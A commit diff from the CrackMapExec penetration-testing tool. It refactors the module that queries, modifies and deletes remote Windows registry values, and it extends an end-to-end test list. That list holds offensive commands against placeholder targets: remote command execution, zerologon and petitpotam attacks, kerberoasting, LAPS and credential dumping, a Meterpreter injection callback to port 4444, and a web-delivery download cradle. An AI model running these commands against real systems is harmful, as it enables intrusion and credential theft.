tests: update tests

cme/modules/reg-query.py

@@ -7,21 +7,29 @@ from impacket.examples.secretsdump import RemoteOperations
 
 
 class CMEModule:
-    name = 'reg-query'
+    def __init__(self, context=None):
-    description = 'Performs a registry query on the machine'
+        self.delete = None
-    supported_protocols = ['smb']
+        self.type = None
-    opsec_safe = True 
+        self.value = None
-    multiple_hosts = True 
+        self.key = None
+        self.path = None
+        self.name = 'reg-query'
+        self.description = 'Performs a registry query on the machine'
+        self.supported_protocols = ['smb']
+        self.opsec_safe = True
+        self.multiple_hosts = True
+        self.context = context
 
     def options(self, context, module_options):
-        '''
+        """
-        PATH:  Registry key path to query
+        PATH    Registry key path to query
-        KEY:   Registry key value to retrieve
+        KEY     Registry key value to retrieve
-        VALUE  Registry key value to set (only used for modification). Will add a new regitry key if use on registry key that does not already exist
+        VALUE   Registry key value to set (only used for modification)
-        TYPE   Type of registry to modify, add or delete. Default type : REG_SZ. Type supported : REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
+                Will add a new registry key if the registry key does not already exist
+        TYPE    Type of registry to modify, add or delete. Default type : REG_SZ.
+                Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
         DELETE  If set to True, delete a registry key if it does exist
-        '''
+        """
-
         self.context = context
         self.path = None
         self.key = None
@@ -54,12 +62,12 @@ class CMEModule:
                     try :
                         self.value = int(self.value)
                     except:
-                        context.log.error("Invalid registry value type specified: %s" % self.value)
+                        context.log.error(f"Invalid registry value type specified: {self.value}")
-                        sys.exit(1)
+                        return
                 if self.type in type_dict:
                     self.type = type_dict[self.type]
                 else:
-                    context.log.error("Invalid registry value type specified: %s" % self.type)
+                    context.log.error(f"Invalid registry value type specified: {self.type}")
                     return
             else:
                 self.type = 1
@@ -68,83 +76,114 @@ class CMEModule:
             self.delete = True
 
     def on_admin_login(self, context, connection):
+        self.context = context
         if not self.path:
-            context.log.error("Please provide the path of the registry to query")
+            self.context.log.error("Please provide the path of the registry to query")
             return
-
         if not self.key:
-            context.log.error("Please provide the registry key to query")
+            self.context.log.error("Please provide the registry key to query")
             return
 
-        remoteOps = RemoteOperations(connection.conn, False)
+        remote_ops = RemoteOperations(connection.conn, False)
-        remoteOps.enableRegistry()
+        remote_ops.enableRegistry()
                 
         try:
             if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
-                self.path = (self.path).replace('HKLM\\', '')
+                self.path = self.path.replace('HKLM\\', '')
-                ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
+                ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
-
             elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
-                self.path = (self.path).replace('HKCU\\', '')
+                self.path = self.path.replace('HKCU\\', '')
-                ans = rrp.hOpenCurrentUser(remoteOps._RemoteOperations__rrp)
+                ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
-
             elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
-                self.path = (self.path).replace('HKCR\\', '')
+                self.path = self.path.replace('HKCR\\', '')
-                ans = rrp.hOpenClassesRoot(remoteOps._RemoteOperations__rrp)
+                ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
-
             else:
-                context.log.error("Unsupported registry hive specified in path: %s" % self.path)
+                self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
                 return
             
-            regHandle = ans['phKey']
+            reg_handle = ans['phKey']
-            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, self.path)
+            ans = rrp.hBaseRegOpenKey(
-            keyHandle = ans['phkResult']
+                remote_ops._RemoteOperations__rrp,
+                reg_handle,
+                self.path
+            )
+            key_handle = ans['phkResult']
 
             if self.delete:
                 # Delete registry
                 try:
                     # Check if value exists
-                    dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
+                    data_type, reg_value = rrp.hBaseRegQueryValue(
+                        remote_ops._RemoteOperations__rrp,
+                        key_handle,
+                        self.key
+                    )
                 except:
-                    self.context.log.error("Registry key %s does not exist" % (self.key))
+                    self.context.log.error(f"Registry key {self.key} does not exist")
                     return
                 # Delete value
-                rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
+                rrp.hBaseRegDeleteValue(
-                self.context.log.success('Registry key %s has been deleted successfully' % (self.key))
+                    remote_ops._RemoteOperations__rrp,
-                rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
+                    key_handle,
+                    self.key
+                )
+                self.context.log.success(f"Registry key {self.key} has been deleted successfully")
+                rrp.hBaseRegCloseKey(
+                    remote_ops._RemoteOperations__rrp,
+                    key_handle
+                )
 
             if self.value is not None:
                 # Check if value exists
                 try:
                     # Check if value exists
-                    dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
+                    data_type, reg_value = rrp.hBaseRegQueryValue(
-                    self.context.log.highlight("Key %s exists with value %s" % (self.key, reg_value))
+                        remote_ops._RemoteOperations__rrp,
+                        key_handle,
+                        self.key
+                    )
+                    self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
                     # Modification
-                    rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
+                    rrp.hBaseRegSetValue(
-                    context.log.success("Key %s has been modified to %s" % (self.key, self.value))
+                        remote_ops._RemoteOperations__rrp,
+                        key_handle,
+                        self.key,
+                        self.type,
+                        self.value
+                    )
+                    self.context.log.success(f"Key {self.key} has been modified to {self.value}")
                 except:
-                    rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
+                    rrp.hBaseRegSetValue(
-                    self.context.log.success("New Key %s has been added with value %s" % (self.key, self.value))
+                        remote_ops._RemoteOperations__rrp,
-                    rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
+                        key_handle,
-                    
+                        self.key,
+                        self.type,
+                        self.value
+                    )
+                    self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
+                    rrp.hBaseRegCloseKey(
+                        remote_ops._RemoteOperations__rrp,
+                        key_handle
+                    )
             else:
                 # Query
                 try:
-                    dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
+                    data_type, reg_value = rrp.hBaseRegQueryValue(
-                    context.log.highlight("%s: %s" % (self.key, reg_value))
+                        remote_ops._RemoteOperations__rrp,
+                        key_handle,
+                        self.key
+                    )
+                    self.context.log.highlight(f"{self.key}: {reg_value}")
                 except:
                     if self.delete:
                         pass
                     else:
-                        self.context.log.error("Registry key %s does not exist" % (self.key))
+                        self.context.log.error(f"Registry key {self.key} does not exist")
                         return
-            rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
+            rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
-
         except DCERPCException as e:
-            #context.log.error("DCERPC Error while querying or modifying registry: %s" % e)
+            self.context.log.error(f"DCERPC Error while querying or modifying registry: {e}")
-            pass
         except Exception as e:
-            context.log.error("Error while querying or modifying registry: %s" % e)
+            self.context.log.error(f"Error while querying or modifying registry: {e}")
-            
         finally:
-            remoteOps.finish()
+            remote_ops.finish()

tests/e2e_commands.txt

@@ -1,3 +1,4 @@
+##### SMB
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
@@ -20,6 +21,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
+##### SMB Modules
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
@@ -58,7 +60,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
-crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
+crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
@@ -122,8 +124,10 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
 crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
+##### SMB Anonymous Auth
 crackmapexec smb TARGET -u '' -p '' -M zerologon
 crackmapexec smb TARGET -u '' -p '' -M petitpotam
+##### LDAP
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
@@ -132,6 +136,7 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/o
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
+##### LDAP Modules
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
@@ -154,18 +159,27 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
 crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
-crackmapexec winrm TARGET -u USERNAME -p PASSWORD
+##### WINRM
-crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
+crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS
-crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
+crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD
+crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS --laps
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
+##### MSSQL
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
+##### MSSQL Modules
 # crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
-crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle
+crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
+# a bit janky, but we try to enable RDP before testing RDP
+crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
+##### RDP
+crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS
+crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS --nla-screenshot